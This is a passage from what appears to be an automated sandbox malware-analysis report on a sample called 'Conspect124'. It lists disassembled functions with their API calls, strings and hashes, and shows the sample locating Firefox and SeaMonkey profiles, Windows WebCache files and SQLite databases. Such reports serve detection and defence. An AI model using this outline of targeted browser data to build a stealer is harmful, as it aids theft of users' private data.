                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                      • API String ID: 4039892925-2068335096
                                      • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                      • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                      Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00403FE1
                                      • memset.MSVCRT ref: 00403FF6
                                      • memset.MSVCRT ref: 0040400B
                                      • memset.MSVCRT ref: 00404020
                                      • memset.MSVCRT ref: 00404035
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 004040FC
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                      • API String ID: 4039892925-3369679110
                                      • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                      • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                      Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                      • API String ID: 3510742995-2641926074
                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                      Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                      • memset.MSVCRT ref: 004033B7
                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                      • wcscmp.MSVCRT ref: 004033FC
                                      • _wcsicmp.MSVCRT ref: 00403439
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                      • String ID: $0.@
                                      • API String ID: 2758756878-1896041820
                                      • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                      • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                      Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 2941347001-0
                                      • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                      • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                      Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00403C09
                                      • memset.MSVCRT ref: 00403C1E
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                      • wcscat.MSVCRT ref: 00403C47
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                      • wcscat.MSVCRT ref: 00403C70
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                      • API String ID: 1534475566-1174173950
                                      • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                      • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                      Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                      • memset.MSVCRT ref: 00414C87
                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                      • wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                      • API String ID: 71295984-2036018995
                                      • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                      • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                      Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcschr.MSVCRT ref: 00414458
                                      • _snwprintf.MSVCRT ref: 0041447D
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                      • String ID: "%s"
                                      • API String ID: 1343145685-3297466227
                                      • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                      • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                      Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProcessTimes
                                      • String ID: GetProcessTimes$kernel32.dll
                                      • API String ID: 1714573020-3385500049
                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                      Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004087D6
                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                      • memset.MSVCRT ref: 00408828
                                      • memset.MSVCRT ref: 00408840
                                      • memset.MSVCRT ref: 00408858
                                      • memset.MSVCRT ref: 00408870
                                      • memset.MSVCRT ref: 00408888
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                      • String ID:
                                      • API String ID: 2911713577-0
                                      • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                      • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                      Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: @ $SQLite format 3
                                      • API String ID: 1475443563-3708268960
                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                      Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmpqsort
                                      • String ID: /nosort$/sort
                                      • API String ID: 1579243037-1578091866
                                      • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                      • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                      Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040E60F
                                      • memset.MSVCRT ref: 0040E629
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                      Strings
                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                      • API String ID: 2887208581-2114579845
                                      • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                      • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                      Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID:
                                      • API String ID: 3473537107-0
                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                      Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                      • API String ID: 2221118986-1725073988
                                      • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                      • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                      Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??3@DeleteObject
                                      • String ID: r!A
                                      • API String ID: 1103273653-628097481
                                      • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                      • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                      Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
